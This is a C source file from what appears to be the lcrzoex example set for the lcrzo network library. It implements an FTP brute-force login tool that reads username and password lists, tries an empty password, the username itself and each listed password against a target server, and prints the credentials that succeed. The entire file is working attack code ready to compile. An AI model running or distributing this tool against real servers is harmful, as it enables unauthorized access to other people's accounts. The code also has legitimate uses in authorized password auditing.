
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000268=
{ /*reference*/     "lcrzoex", 268,
  /*version*/       1, 0,
  /*title*/         "passive ftp brute force",
  /*french title*/  "ftp passif brute force",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port usernamesfile passwdsfile",
  /*french usage*/  "nom_serveur port_serveur fichierutilisateurs fichiermotsdepasse",
  /*usage example*/ "1.2.3.5 21 /tmp/userlist /tmp/passlist",
  /*fr. usage ex.*/ "1.2.3.5 21 /tmp/listutil /tmp/listepasswd",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000268_main(int argc, char *argv[]);
int lcrzoex_000268_ftp_brute(lcrzo_ipl ipl,
			     lcrzo_uint16 port,
			     lcrzo_conststring user,
			     lcrzo_conststring pass);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000268_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_uint16 port;
  lcrzo_string user, pass;
  lcrzo_int32 datasize;
  lcrzo_file fileuser, filepass;

  lcrzo_init();
  if ( argc<5 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000268, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize the needed variables */
  lcrzo_epr(shared_para_ipl_init_dst(argv[1], &ipl));
  lcrzo_epr(shared_para_port_init_dst(argv[2], 21, &port));
  lcrzo_epr(lcrzo_file_open_read(argv[3], &fileuser));

  /* read each line of the files all try to access */  
  while ( lcrzo_file_readm_line(&fileuser, LCRZO_WAIT_INFINITE, 
				(lcrzo_data*)&user, &datasize)
	  == LCRZO_ERR_OK )
  { user[datasize]='\0';
    /* first, try with pass=="" */
    lcrzo_epr(lcrzoex_000268_ftp_brute(ipl, port, user, ""));
    /* then, try with pass==login */
    lcrzo_epr(lcrzoex_000268_ftp_brute(ipl, port, user, user));
    /* then try each password of the file */
    lcrzo_epr(lcrzo_file_open_read(argv[4], &filepass));
    while ( lcrzo_file_readm_line(&filepass, LCRZO_WAIT_INFINITE, 
				  (lcrzo_data*)&pass, &datasize)
	  == LCRZO_ERR_OK )
    { pass[datasize]='\0';
      lcrzo_epr(lcrzoex_000268_ftp_brute(ipl, port, user, pass));
      lcrzo_epr(lcrzo_string_free2(&pass));
    }
    lcrzo_epr(lcrzo_file_close(&filepass));
    lcrzo_epr(lcrzo_string_free2(&user));
  }

  /* close */
  lcrzo_epr(lcrzo_file_close(&fileuser));
  lcrzo_close();
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000268_ftp_brute(lcrzo_ipl ipl,
			     lcrzo_uint16 port,
			     lcrzo_conststring user,
			     lcrzo_conststring pass)
{ static lcrzo_int32 numtest=0;
  lcrzo_sock sock;
  lcrzo_data data, error;
  lcrzo_int32 datasize, errorsize;
  lcrzo_uint16 num;
  int ret;

  /* open the connection */
  lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, port, &sock));

  /* first, we read the banner */
  lcrzo_epr(lcrzo_sock_readm(&sock, LCRZO_WAIT_INFINITE, &data, &datasize));
  lcrzo_epr(lcrzo_data_free2(&data));

  /* then, we send a 'USER' */
  lcrzo_epr(shared_ftp_cmd_user(&sock, user));

  /* then, we send a 'PASS' */
  lcrzo_epr(lcrzo_data_initm_text("PASS ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(pass, datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(&sock, data, datasize));
  lcrzo_epr(lcrzo_data_free2(&data));
  ret=shared_misc_verifyresponse(&sock, 230, 230, 230, 230,
				 LCRZO_FALSE, &num, &error, &errorsize);
  error[errorsize]='\0';
  while ( strlen((lcrzo_string)error) && error[strlen((lcrzo_string)error)-1]==0x0A) 
    error[strlen((lcrzo_string)error)-1]='\0';
  while ( strlen((lcrzo_string)error) && error[strlen((lcrzo_string)error)-1]==0x0D) 
    error[strlen((lcrzo_string)error)-1]='\0';
  if ( ret==LCRZO_ERR_OK )
  { printf("%s\t%s\t-> %d (%s)\n", user, pass, num, error);
  }
  else if ( ret==LCRZOEX_ERR_MISC_BADRESPONSE )
  { numtest++;
    if (!(numtest%10)) 
    { lcrzo_epr(lcrzo_int32_print("", numtest, "%d", " passwd tried"));
    }
  }
  lcrzo_epr(lcrzo_data_free2(&error));

  /* then, we send a 'QUIT' */
  lcrzo_epr(shared_ftp_cmd_quit(&sock));

  /* close */
  lcrzo_epr(lcrzo_sock_close(&sock));

  return(LCRZO_ERR_OK);
}



